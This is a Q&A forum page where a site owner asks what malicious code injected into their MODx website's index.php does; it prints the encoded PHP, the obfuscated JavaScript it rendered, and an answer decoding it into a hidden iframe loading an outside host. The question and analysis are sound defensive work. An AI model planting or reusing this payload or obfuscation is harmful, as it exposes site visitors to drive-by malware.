Home/ Questions/Q 7696479
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-31T21:47:19+00:00

Recently our MODx Evolution based website was vulnerable to exploit. Code was inserted into

  • 0

Recently our MODx Evolution based website was vulnerable to exploit. Code was inserted into its index.php.

echo(gzinflate(base64_decode("3VZNc5swEP0rLRcgTBwkhIAh6qW99NxjJgfHhppMgm1Q6ok94bdXu5IwdmKHZnrodAbLeNndt19vzXU7a6qV/DIX36ayyOeiLjaf5p6fL8Tlatq0xfdaem5IqOtfxXlVepuqni83k/ly9vRY1NKXzfNO2TjrTeFMVs1SLuXzqniZTeVs4a3Xa3+33Qp3+uDm8P3LDbbbvG2F44Az4u9K4ZZu4Dbqs3xUx9fFtHHzUpTqFmRzdRRu/lIIuajam3LSPt21svEI8ZWr21wK91k9roUTTeIOPjGBI+xI3JGsY1kXMyVgKUgTOECJZXDHlKSjVGn3oqSL0Elkfh8pxxxQlAWIGOkYegTzKDU/eguFTlKENiFk2gyFBB2AmCqo2Eo4uIpNJscZxfwYQkkABW5pemTJwYpYxUiHrgM7gTOuVqnG1UEl+1R5R7MzoZJYRwBPwAXtSxETrKy6IAuFAU+pNcaI4CF6Tgdt0RFy1B7q9ocS61SYNdFuuQFFcWrdY2TYlUTXArxqRVWeUKth1BQu7BwcDC8MAw/Wt9h6J6a2iLLPW5tHe2VikiN2pnRlzlhwE3w2GNlBYVPji/dRWEnU9y/Ww4NYJlC8dM/1VNkS9n76fjCrZqqWGiVmQJLBkGhfllghppZCOtT2gGmwgRTziEIYLd27k/OllAg/R4WhANF16Cx9Ix8yknRv09VuAo5+cBPRzJJxBMWYodh+Gm0Jz+4mu2/OcLDfPLpEIc44Hy4/292k5zj0NDniejo5YrMeT/KfE/qtyr2iH/0T3h0swdf002Udgfg+Q3uk94k6GvWQy4M1Nd7FgPXv2n9kSF8v4INRPdyof4sZJxb5KOQP/Sf/C+8vQM7E/FvsMZVRRAfzjYGBa9iLJ5e1M2lXD5X0nGnn9G98vp+Xy8arRJhXnwUnJK+CwN/diwreKNs2+CGbqv55U956l4sLj16SgFzUN/e3yvAF3zbXSgveO7dbv/AcJ1j7+fWVeQP+DQ==")));

In the rendered HTML output it looks like:

</html><script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new"qwe".prototype}catch(qqq){zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=611;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>

Although code is now removed and the vulnerability is fixed. I would like to know what this code does? Maybe I have to warn some of my users.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    The n variables contains the obfuscated code, the rest of the script is used to deobfuscated and evaluated that code. The content is the follow:

    if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://motivemus.mooo.com/showthread.php?t=45122773' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://motivemus.mooo.com/showthread.php?t=45122773');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
    • 0